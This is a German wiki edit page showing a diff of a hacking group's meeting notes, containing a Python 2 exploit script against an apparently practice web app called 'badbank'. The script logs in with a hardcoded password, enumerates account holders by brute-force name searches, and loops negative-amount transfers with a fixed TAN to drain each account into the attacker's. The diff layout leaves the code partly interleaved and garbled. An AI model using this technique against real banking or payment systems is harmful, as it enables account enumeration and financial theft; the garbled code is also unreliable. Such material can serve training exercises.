Bearbeiten von „CInsects/Protokolle/CInsects:Treffen-2010-11-16“
Zur Navigation springen
Zur Suche springen
Warnung: Du bist nicht angemeldet. Deine IP-Adresse wird bei Bearbeitungen öffentlich sichtbar. Melde dich an oder erstelle ein Benutzerkonto, damit Bearbeitungen deinem Benutzernamen zugeordnet werden.
Die Bearbeitung kann rückgängig gemacht werden. Bitte prüfe den Vergleich unten, um sicherzustellen, dass du dies tun möchtest, und veröffentliche dann unten deine Änderungen, um die Bearbeitung rückgängig zu machen.
Aktuelle Version | Dein Text | ||
Zeile 1: | Zeile 1: | ||
= Exploit = | = Exploit = | ||
Haesslicher Quelltext: | |||
<code> | |||
< | |||
import urllib2 | import urllib2 | ||
import urllib | import urllib | ||
import cookielib | import cookielib | ||
import re | |||
from itertools import product | |||
import string | import string | ||
cj = cookielib.CookieJar() | cj = cookielib.CookieJar() | ||
Zeile 25: | Zeile 17: | ||
url = 'http://badbank.cinsects.de' | url = 'http://badbank.cinsects.de' | ||
data = urllib.urlencode({ | |||
'user': 'Jan', | |||
'password': 'AZyNEBAeTC' | |||
}) | |||
request = urllib2.urlopen(url + '/index.php', data) | |||
login = request.read() | |||
def | def alpha_beta_liste(): | ||
return [a+b for a, b in product(string.lowercase, string.lowercase)] | |||
def search(params): | |||
print params | |||
def | req = urllib2.urlopen(url + '/index.php?page=search', params) | ||
params | suche = req.read() | ||
result = ktnre.findall(suche) | |||
if result: | |||
name_nummer_list.append(result) | |||
print name_nummer_list | |||
if | |||
print | |||
def transfer(kontonummer, betrag, tan_id, tan): | |||
params = urllib.urlencode({'account': kontonummer, 'amount': betrag, 'tan_id': tan_id, 'tan': tan}) | |||
req = urllib2.urlopen(url + '/index.php?page=transfer', params) | |||
seite = req.read() | |||
if erfolg.findall(seite): | |||
print "Von %s wurden %s Geldeinheiten auf mein Konto ueberwiesen." % (name, -betrag) | |||
else: | |||
print "Es konnte leider kein Geld von %s auf mein Konto ueberwiesen werden." % name | |||
alphabeta = alpha_beta_liste() | |||
ktnre = re.compile('<td>(.*)</td>') | |||
betrag = -10 | |||
tan_id = 500 | |||
tan = 700338 | |||
erfolg = re.compile("<h2>Erfolgreiche Ueberweisung!</h2>") | |||
name_nummer_list = [] | |||
for name in alphabeta: | |||
print name | |||
params = urllib.urlencode({'name': name}) | |||
params = urllib.urlencode({ | |||
while True: | while True: | ||
try: | try: | ||
search(params) | |||
break | break | ||
except: | except urllib2.URLError, e: | ||
print "Fehler aufgetreten" + e | |||
while True: | |||
for elem in name_nummer_list: | |||
name, kontonummer = elem | |||
while True: | while True: | ||
try: | |||
transfer(kontonummer, betrag, tan_id, tan) | |||
break | |||
except: | |||
pass | |||
</code> | |||
</ | |||